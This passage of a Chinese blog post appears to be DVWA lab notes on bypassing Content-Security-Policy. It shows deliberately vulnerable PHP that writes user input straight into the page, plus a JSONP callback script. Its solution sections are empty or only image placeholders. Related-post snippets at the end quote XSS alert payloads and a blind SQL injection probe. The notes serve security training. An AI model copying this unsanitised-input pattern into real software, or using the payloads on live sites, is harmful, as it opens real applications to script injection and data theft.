    s.src = "source/jsonp.php?callback=solveSum";
    document.body.appendChild(s);
}
function solveSum(obj) {
    if ("answer" in obj) {
        document.getElementById("answer").innerHTML = obj['answer'];
    }
}
var solve_button = document.getElementById ("solve");

if (solve_button) {
    solve_button.addEventListener("click", function() {
        clickButton();
    });
}

?>

<?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= '

Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.

'; ``` ### 解决方法: 首先尝试使用scrip方式,发现浏览器有报错 [外链图片转存中...(img-wH7dnhQu-1645644879769)] [外链图片转存中...(img-8bivCdE8-1645644879769)] [外链图片转存中...(img-xbrX7NPA-1645644879769)] 看起来像base64,进行解码后发现,他羞辱我 [外链图片转存中...(img-HaPb3E6J-1645644879770)] 经过查阅发现报错信息含有nonce [外链图片转存中...(img-zF17bu9v-1645644879770)] 头部指定了 nonce 值, 所以自动忽略了 ‘unsafe-inline’ 这个参数. 因此可以判断这两个参数是不能共存的, 而且如果共存, 后者是会覆盖前者的正确的防御方式下的 nonce 值不应该是个固定值, 而是应该是个随机生成的值, 这样才能真正达到防止 XSS 的目的 主要另nonce跟代码中的随机数保持一致即可 ```php+HTML ``` ## High ### 源码解析: PHP ```php+HTML <?php $headerCSP = "Content-Security-Policy: script-src 'self';"; header($headerCSP); ?>

<?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= '

The page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.

1+2+3+4+5=

'; ``` Javascript ```javascript function clickButton() { var s = document.createElement("script"); s.src = "source/jsonp.php?callback=solveSum"; document.body.appendChild(s); } function solveSum(obj) { if ("answer" in obj) { document.getElementById("answer").innerHTML = obj['answer']; } } var solve_button = document.getElementById ("solve"); if (solve_button) { solve_button.addEventListener("click", function() { clickButton(); }); } ``` ### 解决方法:

枫糖丶
关注
专栏目录
DVWA全系列笔记
BROTHERYY的博客
08-21 5183
文章目录一、DVWA的安装二、漏洞学习2.1 Brute Force2.1.1 Brute Force(low)2.1.2 Brute Force(Medium)2.1.3 Brute Force(High)2.2 Command Injection(命令注入)2.2.1 Command Injection(Low)2.2.2 Command Injection(Medium)2.2.3 Command Injection(High)2.3 Csrf(跨站请求伪造)2.3.1 Csrf(Low)2.3.2
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 578
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4
最新发布
Libra1313的博客
07-03 2131
DVWA代表Damn Vulnerable Web Application,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过攻击这些漏洞场景来学习和实践漏洞利用技术。这些漏洞包括常见的安全问题,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。通过攻击这些漏洞,用户可以了解漏洞的原理、影响和防御方法。
DVWA学习笔记(自用)
a_qiao_的博客
08-21 266
DVWA学习笔记(自用) XSS(reflected) LOW 此处因为标签没有被过滤,所以此处被当作script语言被执行了 在不看源码的情况下,先尝试普通字符 观察源码处,字符被显示出来了 再输入标签,看标签是否被过滤 观察源码可以发现,button标签未被过滤,所以找到了漏洞 Medium <Script>alert(123456)</script> 混淆或大小写绕过 high <img src="" οnerrοr="alert('XSS')">
DVWA通关笔记
m0_52450604的博客
02-01 200
DVWA通关笔记(一) SQL Injection
DVWA学习笔记全等级
06-08
DVWA学习笔记全等级
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1037
​ SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwa的sql注入的相关笔记。仅供学习。 ​
Dvwa之SQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1340
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
Dvwa漏洞学习笔记(low)
2301_80366980的博客
01-21 972
记录low难度的dvwa基础漏洞仅供个人学习,如有冒犯请尽快联系。
DVWA笔记
陌茗228.的博客
04-11 136
DVWA Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS (DOM) XSS(Reflected)(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) Weak Session IDs (弱会话)
DVWA学习
weixin_42299862的博客
03-17 228
https://www.freebuf.com/articles/web/120747.html
关于DVWA学习
auto1988的博客
08-10 100
1.先说一下DVWA的搭建:http://www.freebuf.com/sectool/102661.html 这个教程已经说的很清楚了,就不加赘述了,讲一下自己装的时候出现的小问题吧 1)有一点过于依赖教程了,强行去安装了winxp,装了半天,突然发现,有点不对,直接以前的win7或者物理机应该就可以用了啊,哇,浪费了时间,装完了才意识到这个问题,我觉得还是太依赖教程了,还有就是...
dvwa学习笔记1
qq_41555580的博客
03-01 294
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

枫糖丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值